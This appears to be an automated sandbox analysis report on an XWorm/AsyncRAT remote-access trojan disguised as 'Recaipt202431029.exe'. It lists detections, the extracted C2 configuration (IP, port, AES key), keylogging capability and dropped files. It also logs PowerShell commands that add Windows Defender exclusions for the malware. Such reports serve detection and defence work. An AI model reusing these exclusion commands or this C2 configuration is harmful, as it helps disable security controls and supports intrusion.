            Source: Recaipt202431029.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeAvira: detection malicious, Label: HEUR/AGEN.1306877
            Source: C:\Users\user\AppData\Roaming\Notepab .exeAvira: detection malicious, Label: HEUR/AGEN.1306877
            Found malware configuration
            Source: 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["172.245.244.69"], "Port": 5200, "Aes key": "1987", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeReversingLabs: Detection: 68%
            Source: C:\Users\user\AppData\Roaming\Notepab .exeReversingLabs: Detection: 68%
            Multi AV Scanner detection for submitted file
            Source: Recaipt202431029.exeReversingLabs: Detection: 68%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\Notepab .exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: Recaipt202431029.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: 172.245.244.69
            Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: 5200
            Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: 1987
            Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: <Xwormmm>
            Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: BEHROOZ
            Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: USB.exe
            Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: %AppData%
            Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: Notepab .exe
            Source: Recaipt202431029.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Recaipt202431029.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: UQzc.pdbSHA256T source: Recaipt202431029.exe, JvkAPBBIe.exe.0.dr, Notepab .exe.9.dr
            Source: Binary string: UQzc.pdb source: Recaipt202431029.exe, JvkAPBBIe.exe.0.dr, Notepab .exe.9.dr

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 172.245.244.69:5200 -> 192.168.2.5:49710
            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:49710 -> 172.245.244.69:5200
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: 172.245.244.69
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.244.69
            Source: Recaipt202431029.exe, 00000000.00000002.2123977991.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Recaipt202431029.exe, 00000009.00000002.4558767346.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, JvkAPBBIe.exe, 0000000A.00000002.2181051292.0000000003102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to log keystrokes (.Net Source)
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
            Source: C:\Users\user\Desktop\Recaipt202431029.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 0.2.Recaipt202431029.exe.3630650.3.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.Recaipt202431029.exe.3630650.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.Recaipt202431029.exe.3652e70.1.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.Recaipt202431029.exe.3652e70.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 14.2.JvkAPBBIe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 14.2.JvkAPBBIe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000A.00000002.2181051292.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2123977991.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_00B63E280_2_00B63E28
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_00B6E22C0_2_00B6E22C
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_00B670190_2_00B67019
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_0686DF290_2_0686DF29
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06866B600_2_06866B60
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_068846900_2_06884690
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06888C780_2_06888C78
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_068858C00_2_068858C0
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_068850580_2_06885058
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_068829480_2_06882948
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_068815780_2_06881578
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06C707100_2_06C70710
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06C70E780_2_06C70E78
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06C784100_2_06C78410
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06C75E480_2_06C75E48
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06C71AD80_2_06C71AD8
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D1A4500_2_06D1A450
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D1C5180_2_06D1C518
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D1C5080_2_06D1C508
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D1C0D30_2_06D1C0D3
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D1C0E00_2_06D1C0E0
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D1A0130_2_06D1A013
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_06D1A8880_2_06D1A888
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_0850885D0_2_0850885D
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_0850F6980_2_0850F698
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_08505FD80_2_08505FD8
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_085090780_2_08509078
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 0_2_085090690_2_08509069
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_016345389_2_01634538
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_016313609_2_01631360
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_016338809_2_01633880
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_01633F409_2_01633F40
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_01631A0A9_2_01631A0A
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_0563E1189_2_0563E118
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_056373D09_2_056373D0
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_0563D2D89_2_0563D2D8
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_05637FD09_2_05637FD0
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_0563F9A89_2_0563F9A8
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_0563DAF09_2_0563DAF0
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_05635D6F9_2_05635D6F
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_05635D809_2_05635D80
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_05632A909_2_05632A90
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_0643AE189_2_0643AE18
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_06439FD09_2_06439FD0
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_06435FF89_2_06435FF8
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_064357289_2_06435728
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_064314889_2_06431488
            Source: C:\Users\user\Desktop\Recaipt202431029.exeCode function: 9_2_064353E09_2_064353E0
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_00E43E2810_2_00E43E28
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_00E4E22C10_2_00E4E22C
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_00E4701910_2_00E47019
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_057E8C7810_2_057E8C78
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_057E157810_2_057E1578
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_057E469010_2_057E4690
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_057E505810_2_057E5058
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_057E294810_2_057E2948
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_06EB071010_2_06EB0710
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_06EB0E7810_2_06EB0E78
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_06EB5E4810_2_06EB5E48
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_0705C50810_2_0705C508
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_0705C51810_2_0705C518
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_0705A45010_2_0705A450
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_0705A01810_2_0705A018
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_0705C0D310_2_0705C0D3
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_0705C0E010_2_0705C0E0
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_0705587010_2_07055870
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_0705A87910_2_0705A879
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_0705A88810_2_0705A888
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_0708004010_2_07080040
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 10_2_0708000710_2_07080007
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeCode function: 14_2_012B136014_2_012B1360
            Source: Recaipt202431029.exe, 00000000.00000002.2121849231.00000000008CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000000.00000002.2126732954.0000000003581000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMrchrisXW.exe4 vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000000.00000002.2146647046.00000000088A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMrchrisXW.exe4 vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000000.00000000.2091044216.0000000000212000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUQzc.exeZ vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000000.00000002.2145704127.000000000848E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUQzc.exeZ vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000000.00000002.2123977991.0000000002581000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000000.00000002.2145095936.0000000006CD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000009.00000002.4566923210.0000000005E89000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Recaipt202431029.exe
            Source: Recaipt202431029.exe, 00000009.00000002.4563447975.00000000040A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUQzc.exeZ vs Recaipt202431029.exe
            Source: Recaipt202431029.exeBinary or memory string: OriginalFilenameUQzc.exeZ vs Recaipt202431029.exe
            Source: Recaipt202431029.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.Recaipt202431029.exe.3630650.3.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.Recaipt202431029.exe.3630650.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.Recaipt202431029.exe.3652e70.1.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.Recaipt202431029.exe.3652e70.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 14.2.JvkAPBBIe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 14.2.JvkAPBBIe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0000000A.00000002.2181051292.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2123977991.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: Recaipt202431029.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: JvkAPBBIe.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Notepab .exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, Settings.csBase64 encoded string: 'y7z7NxMhV6ZsUmY0YLoertFerJJBTb3uF6DEd276QIY8AvEctNsnVw0DB0Scwmym', 'Ymzft32Czvgz/vIi+ZJ4Snux84H4lGCOkdnylPSwDRUstjjUxn94CPNWLSt0c94g'
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, Settings.csBase64 encoded string: 'y7z7NxMhV6ZsUmY0YLoertFerJJBTb3uF6DEd276QIY8AvEctNsnVw0DB0Scwmym', 'Ymzft32Czvgz/vIi+ZJ4Snux84H4lGCOkdnylPSwDRUstjjUxn94CPNWLSt0c94g'
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, WmJXSxm2fenOX5jabt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, WG61eoLfq8l6bLFQSu.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, WG61eoLfq8l6bLFQSu.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Recaipt202431029.exe.376c418.2.raw.unpack, WG61eoLfq8l6bLFQSu.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, WG61eoLfq8l6bLFQSu.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, WG61eoLfq8l6bLFQSu.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, WG61eoLfq8l6bLFQSu.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Recaipt202431029.exe.88a0000.5.raw.unpack, WmJXSxm2fenOX5jabt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/18@0/1
            Source: C:\Users\user\Desktop\Recaipt202431029.exeFile created: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2472:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
            Source: C:\Users\user\Desktop\Recaipt202431029.exeMutant created: \Sessions\1\BaseNamedObjects\wLgC73MktegsYOI5
            Source: C:\Users\user\Desktop\Recaipt202431029.exeFile created: C:\Users\user\AppData\Local\Temp\tmp912F.tmpJump to behavior
            Source: Recaipt202431029.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Recaipt202431029.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\Recaipt202431029.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Recaipt202431029.exeReversingLabs: Detection: 68%
            Source: C:\Users\user\Desktop\Recaipt202431029.exeFile read: C:\Users\user\Desktop\Recaipt202431029.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Recaipt202431029.exe "C:\Users\user\Desktop\Recaipt202431029.exe"
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe"
